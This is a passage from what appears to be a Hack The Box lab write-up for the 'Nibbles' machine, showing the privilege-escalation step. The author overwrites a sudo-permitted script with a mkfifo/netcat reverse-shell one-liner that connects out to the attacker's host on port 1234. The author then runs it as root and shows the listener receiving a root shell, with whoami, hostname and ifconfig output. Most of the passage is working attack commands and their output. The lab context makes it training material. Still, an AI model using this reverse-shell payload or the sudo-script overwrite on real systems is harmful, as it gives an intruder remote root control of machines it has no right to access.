File Overwrite
nibbler@nibbles:/home/nibbler$ echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.6 1234 >/tmp/f" > /home/nibbler/personal/stuff/monitor.shI will just overwrite the file with a reverse shell command
Sudo Command Execution
nibbler@Nibbles:/home/nibbler$ sudo -u root /home/nibbler/personal/stuff/monitor.shExecute the sudo privileged command as root
┌──(kali㉿kali)-[~/archive/htb/labs/nibbles]
└─$ nnc 1234
listening on [any] 1234 ...
connect to [10.10.14.6] from (UNKNOWN) [10.10.10.75] 53164
# whoami
root
# hostname
Nibbles
# ifconfig
ens192 Link encap:Ethernet HWaddr 00:50:56:b9:67:8f
inet addr:10.10.10.75 Bcast:10.10.10.255 Mask:255.255.255.0
inet6 addr: dead:beef::250:56ff:feb9:678f/64 Scope:Global
inet6 addr: fe80::250:56ff:feb9:678f/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:6734 errors:0 dropped:21 overruns:0 frame:0
TX packets:6147 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:4465464 (4.4 MB) TX bytes:2047535 (2.0 MB)
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:65536 Metric:1
RX packets:242 errors:0 dropped:0 overruns:0 frame:0
TX packets:242 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1
RX bytes:19928 (19.9 KB) TX bytes:19928 (19.9 KB)System Level Compromise